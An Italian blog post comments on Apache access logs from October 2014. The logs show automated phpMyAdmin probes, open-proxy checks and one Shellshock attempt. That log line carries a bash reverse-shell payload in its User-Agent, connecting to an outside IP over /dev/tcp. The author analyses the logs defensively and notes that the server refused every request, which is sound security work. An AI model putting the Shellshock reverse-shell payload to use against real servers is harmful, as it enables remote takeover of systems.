venerdì 31 ottobre 2014

ShellShock et alii

Ancora un po' di curiosita sui log di un server Apache 2

ci sono chiaramente dei tentativi mediante script automatici che cercano vulnerabilita' legate a PhpMyAdmin (in giallo) ed un attacco basato su shellshock (in rosso) nella speranza di trovare installato CPanel

Curiose invece le righe in verde in cui vengono effettuate richieste a servizi come proxyjudge che verificano lo stato dei proxy server (forse un modo per verificare se la macchina e' all'interno di un proxy???)

comunque come si vede le risposte del server sono della categoria 400 quindi il file non e' stato trovato

Interessante anche la riga in azzurro in cui viene fatta una richiesta che non risulta essere nel protocollo http

Per finire le nazionalita' dell'origine degli attacchi: in alcuni casi e' Taiwan, in altri Thailandia,

08.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /ujuj/uju/uj.php HTTP/1.1" 404 470 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:18 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.218.252 - - [29/Oct/2014:22:48:19 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
207.240.10.33 - - [29/Oct/2014:23:29:50 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 487 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1"
85.25.72.86 - - [29/Oct/2014:23:30:56 +0000] "GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1" 400 0 "-" "-"
125.64.35.67 - - [30/Oct/2014:00:03:13 +0000] "GET http://6.url.cn/zc/chs/img/body.png HTTP/1.1" 404 450 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.3072; .NET CLR 2.0.50727; .NET CLR 3.0.30729; Tablet PC 2.0)"
61.58.204.97 - - [30/Oct/2014:00:42:07 +0000] "GET /hghg/hgh/hg.php HTTP/1.1" 404 470 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:08 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:09 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.58.204.97 - - [30/Oct/2014:00:42:10 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:50 +0000] "GET /kkkk/kkk/kk.php HTTP/1.1" 404 470 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:51 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:52 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
118.174.140.130 - - [30/Oct/2014:00:55:52 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
1.164.41.53 - - [30/Oct/2014:01:45:02 +0000] "CONNECT mx0.mail2000.com.tw:25 HTTP/1.0" 405 537 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:29 +0000] "GET /asas/asa/as.php HTTP/1.1" 404 470 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
108.61.207.146 - - [30/Oct/2014:04:44:30 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
64.4.97.21 - - [30/Oct/2014:06:37:26 +0000] "GET /tmUnblock.cgi HTTP/1.1" 400 0 "-" "-"

218.59.238.93 - - [30/Oct/2014:11:01:52 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [30/Oct/2014:11:02:14 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"


124.122.165.64 - - [30/Oct/2014:08:53:09 +0000] "GET /vyvy/vyv/vy.php HTTP/1.1" 404 470 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
124.122.165.64 - - [30/Oct/2014:08:53:12 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"

218.59.238.93 - - [29/Oct/2014:16:19:29 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:16:19:44 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"


218.59.238.93 - - [29/Oct/2014:10:07:33 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:10:39:54 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:11:12:40 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [29/Oct/2014:11:13:49 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"

221.165.35.130 - - [27/Oct/2014:23:25:57 +0000] "GET / HTTP/1.1" 200 11820 "-" "-"
65.99.238.246 - - [27/Oct/2014:23:43:43 +0000] "GET / HTTP/1.0" 200 11783 "-" "-"
218.59.238.93 - - [27/Oct/2014:23:46:01 +0000] "GET http://www.anonymousproxylist.net/azenv2.php HTTP/1.0" 404 478 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:00:48:51 +0000] "GET http://yazoodle.net/azenv.php HTTP/1.0" 404 463 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:00:57:38 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
61.19.199.74 - - [28/Oct/2014:01:05:10 +0000] "GET /zyzy/zyz/zy.php HTTP/1.1" 404 470 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:10 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 483 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:11 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 404 476 "-" "-"
61.19.199.74 - - [28/Oct/2014:01:05:11 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 480 "-" "-"
218.59.238.93 - - [28/Oct/2014:01:36:04 +0000] "GET http://proxyjudge.us/ HTTP/1.0" 200 11783 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:01:49:47 +0000] "GET http://www.mesregies.com/azz.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:02:50:52 +0000] "GET http://www.proxyjudge.biz/az.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
218.59.238.93 - - [28/Oct/2014:03:51:04 +0000] "GET http://sonke31.free.fr/world.php HTTP/1.0" 404 466 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"